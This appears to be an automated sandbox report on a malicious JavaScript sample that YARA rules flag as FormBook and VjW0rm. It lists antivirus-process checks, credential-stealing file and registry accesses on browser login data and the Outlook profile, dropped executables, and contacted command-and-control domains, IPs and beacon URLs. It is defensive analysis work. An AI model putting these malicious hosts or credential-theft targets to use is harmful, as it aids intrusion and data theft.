Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000008.00000002.931604379.0000020FBE96F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r\MsMpeng.exe
Source: wscript.exe, 00000001.00000003.676835917.0000022182300000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.842626343.00000221FFF32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.500327144.00000221822C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: wscript.exe, 00000001.00000002.908396849.00000221FFEFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \MsMpeng.exe

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396132606.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403282167.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.401485151.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.402063776.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Yara detected VjW0rm
Source: Yara match File source: 00000004.00000003.422284630.0000014D0B276000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.931430128.0000020FBE071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.927889080.0000014D0B272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.921876626.0000020FBC1E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393763999.0000022181D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.465086435.0000020FBE075000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.908396849.00000221FFEFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.464882412.0000020FBE075000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.923762236.0000014D095CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.907846772.0000022181D81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.922485204.0000026A515F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.422300954.0000014D0B276000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.922294824.0000026A4F89A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.923787188.0000014D095D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393894114.0000022181D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.922283429.0000026A4F890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.921864833.0000020FBC1DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6040, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396132606.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403282167.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.401485151.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.402063776.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Yara detected VjW0rm
Source: Yara match File source: 00000004.00000003.422284630.0000014D0B276000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.931430128.0000020FBE071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.927889080.0000014D0B272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.921876626.0000020FBC1E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393763999.0000022181D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.465086435.0000020FBE075000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.908396849.00000221FFEFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.464882412.0000020FBE075000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.923762236.0000014D095CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.907846772.0000022181D81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.922485204.0000026A515F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.422300954.0000014D0B276000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.922294824.0000026A4F89A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.923787188.0000014D095D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393894114.0000022181D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.922283429.0000026A4F890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.921864833.0000020FBC1DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6040, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635313 Sample: CIQ-PO162688.js Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 56 www.waermark.com 2->56 58 www.jdhwh2nbiw234.com 2->58 60 9 other IPs or domains 2->60 78 Snort IDS alert for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 12 other signatures 2->84 11 wscript.exe 3 2->11         started        signatures3 process4 file5 52 C:\Users\user\AppData\Local\Temp\bin.exe, PE32 11->52 dropped 54 C:\Users\user\AppData\Roaming\RmiIjXZkdd.js, ASCII 11->54 dropped 102 System process connects to network (likely due to code injection or exploit) 11->102 104 Benign windows process drops PE files 11->104 106 Drops script or batch files to the startup folder 11->106 108 2 other signatures 11->108 15 bin.exe 11->15         started        18 wscript.exe 2 13 11->18         started        signatures6 process7 dnsIp8 110 Antivirus detection for dropped file 15->110 112 Multi AV Scanner detection for dropped file 15->112 114 Machine Learning detection for dropped file 15->114 116 5 other signatures 15->116 22 explorer.exe 1 6 15->22 injected 62 dilshadkhan.duia.ro 91.193.75.133, 49722, 49723, 49724 DAVID_CRAIGGG Serbia 18->62 46 C:\Users\user\AppData\...\RmiIjXZkdd.js, ASCII 18->46 dropped file9 signatures10 process11 dnsIp12 64 www.tentanguang.online 185.27.134.149, 49795, 49796, 49797 WILDCARD-ASWildcardUKLimitedGB United Kingdom 22->64 66 www.waermark.com 185.53.179.172, 49826, 49827, 49828 TEAMINTERNET-ASDE Germany 22->66 68 17 other IPs or domains 22->68 48 C:\Users\user\AppData\...\u8g48fg0phzxan.exe, PE32 22->48 dropped 50 C:\Program Files (x86)\...\u8g48fg0phzxan.exe, PE32 22->50 dropped 88 System process connects to network (likely due to code injection or exploit) 22->88 90 Performs DNS queries to domains with low reputation 22->90 27 help.exe 1 12 22->27         started        30 wscript.exe 12 22->30         started        33 wscript.exe 12 22->33         started        35 2 other processes 22->35 file13 signatures14 process15 dnsIp16 92 Creates an undocumented autostart registry key 27->92 94 Tries to steal Mail credentials (via file / registry access) 27->94 96 Tries to harvest and steal browser information (history, passwords, etc) 27->96 100 3 other signatures 27->100 37 cmd.exe 2 27->37         started        40 cmd.exe 1 27->40         started        70 dilshadkhan.duia.ro 30->70 98 System process connects to network (likely due to code injection or exploit) 30->98 72 dilshadkhan.duia.ro 33->72 74 dilshadkhan.duia.ro 35->74 76 192.168.2.1 unknown unknown 35->76 signatures17 process18 signatures19 86 Tries to harvest and steal browser information (history, passwords, etc) 37->86 42 conhost.exe 37->42         started        44 conhost.exe 40->44         started        process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.54.117.217
 parkingpage.namecheap.com United States
22612 NAMECHEAP-NETUS false
81.169.145.161
 xn--wsthof-camping-gsb.com Germany
6724 STRATOSTRATOAGDE true
3.64.163.50
 www.brandpay.xyz United States
16509 AMAZON-02US true
185.53.179.172
 www.waermark.com Germany
61969 TEAMINTERNET-ASDE true
85.159.66.93
 natroredirect.natrocdn.com Turkey
34619 CIZGITR true
162.0.230.89
 www.topings33.com Canada
22612 NAMECHEAP-NETUS true
23.19.171.24
 www.harmlett.com United States
396190 LEASEWEB-USA-SEA-10US true
68.66.224.33
 www.getbusinesscreditandfunding.com United States
55293 A2HOSTINGUS true
185.27.134.149
 www.tentanguang.online United Kingdom
34119 WILDCARD-ASWildcardUKLimitedGB true
185.134.245.113
 www.localbloom.online Norway
12996 DOMENESHOPOsloNorwayNO true
23.82.37.10
 www.shcylzc.com United States
396190 LEASEWEB-USA-SEA-10US true
91.193.75.133
 dilshadkhan.duia.ro Serbia
209623 DAVID_CRAIGGG true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
parkingpage.namecheap.com 198.54.117.217 true
dilshadkhan.duia.ro 91.193.75.133 true
www.refreshertowels.com 23.231.99.207 true
www.topings33.com 162.0.230.89 true
www.harmlett.com 23.19.171.24 true
natroredirect.natrocdn.com 85.159.66.93 true
www.localbloom.online 185.134.245.113 true
cdl-lb-1356093980.us-east-1.elb.amazonaws.com 3.208.142.147 true
www.multiverseofbooks.com 66.96.130.20 true
www.waermark.com 185.53.179.172 true
xn--wsthof-camping-gsb.com 81.169.145.161 true
www.tentanguang.online 185.27.134.149 true
www.brandpay.xyz 3.64.163.50 true
www.getbusinesscreditandfunding.com 68.66.224.33 true
www.shcylzc.com 23.82.37.10 true
halecamilla.site 207.174.214.35 true
www.vitality-patients.online unknown unknown
www.gabefancher.com unknown unknown
www.jdhwh2nbiw234.com unknown unknown
www.siberup.xyz unknown unknown
www.halecamilla.site unknown unknown
www.angelmatic.net unknown unknown
www.gafcbooster.com unknown unknown
www.thepowerofanopenquestion.com unknown unknown
www.xn--wsthof-camping-gsb.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.brandpay.xyz/np8s/ true
  • Avira URL Cloud: phishing
 unknown
http://www.brandpay.xyz/np8s/?3fk4oN=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvKpZqETXTWLI6sH0ZA==&Eh=mhUxl true
  • Avira URL Cloud: phishing
 unknown
http://www.vitality-patients.online/np8s/ true
  • Avira URL Cloud: safe
 unknown
http://www.tentanguang.online/np8s/?3fk4oN=v4u/ceKk0Zb55n135mmkOO9h9NxJ7kGAyBx+qrEyA785N/4y0zrdRsBV3cMwWbOW5k3YBKZGqA==&Eh=mhUxl true
  • Avira URL Cloud: phishing
 unknown
http://www.waermark.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.xn--wsthof-camping-gsb.com/np8s/?3fk4oN=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz/Jz3qNJ0RZyolUFog==&Eh=mhUxl true
  • Avira URL Cloud: malware
 unknown
http://www.harmlett.com/np8s/?aDHdzD=vpgdJ4mxrh&3fk4oN=Hfm8tjP++bF99H8Yixu4yiAA2pucxCUNYZIpJGNk6F/7VNXQ3kF6oq1cnnPYkdM2cMsNINi87w== true
  • Avira URL Cloud: safe
 unknown
http://www.harmlett.com/np8s/ true
  • Avira URL Cloud: safe
 unknown
http://www.shcylzc.com/np8s/?3fk4oN=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDd38wf67F/cvJLwRDA==&Eh=mhUxl true
  • Avira URL Cloud: safe
 unknown
http://www.getbusinesscreditandfunding.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.siberup.xyz/np8s/ true
  • Avira URL Cloud: safe
 unknown
http://www.getbusinesscreditandfunding.com/np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&Eh=mhUxl true
  • Avira URL Cloud: malware
 unknown
http://www.xn--wsthof-camping-gsb.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.vitality-patients.online/np8s/?3fk4oN=RNX6HKFDcklLmbBc9PWX652dIgRYJcuZVnkYPjFZaGFpi0fgSjcQ52/zYZHNiyjWO0COcN7HSw==&Eh=mhUxl true
  • Avira URL Cloud: safe
 unknown
http://www.shcylzc.com/np8s/ true
  • Avira URL Cloud: safe
 unknown
